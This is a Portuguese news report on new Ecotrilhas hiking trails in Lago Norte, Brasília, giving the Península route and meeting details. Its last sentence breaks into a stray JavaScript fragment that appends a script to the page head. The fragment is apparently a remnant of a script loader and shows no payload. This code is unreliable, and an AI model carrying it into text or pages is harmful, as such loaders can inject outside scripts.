Mais duas trilhas serão inauguradas no Lago Norte: a da Península, no sábado (2), e a Caliandras, no domingo (3). Elas são parte do projeto Ecotrilhas, da Administração Regional do Lago Norte, e se somam à Bomtempo, entregue à população em 27 de agosto.
Trilhas no Lago Norte dão acesso a cachoeiras e vistas panorâmicas de Brasília. Foto: Andre Borges/Agência Brasília
Os roteiros têm o objetivo de estimular a educação ambiental e o turismo natural na região da Serrinha do Paranoá. “O meio ambiente precisa ser conhecido e usado pelas pessoas”, explica o administrador regional do Lago Norte e Varjão, Marcos Woortmann. A atividade é parte da programação da Virada do Cerrado na região administrativa.
A trilha da Península tem 20 quilômetros em trajeto urbano. Ela segue pela DF-009, a via principal do Lago Norte, passa pelo Parque Vivencial do Lago Norte Módulo II, pelo Parque da Família e o ParCão, até o Viveiro Comunitário do Lago Norte. “A ideia é integrar áreas bucólicas pouco conhecidas da população”, diz Woortmann.
Para quem quiser conhecer a rota no sábado (2), o ponto de encontro será na Quebra da 13, na QL 13, a partir das 8 horas. Na inauguração, estão previstas uma oficina de identificação de árvores do Cerrado e a manutenção do plantio dos bosques.d.getElementsByTagName(\’head\’)[0].appendChild(s);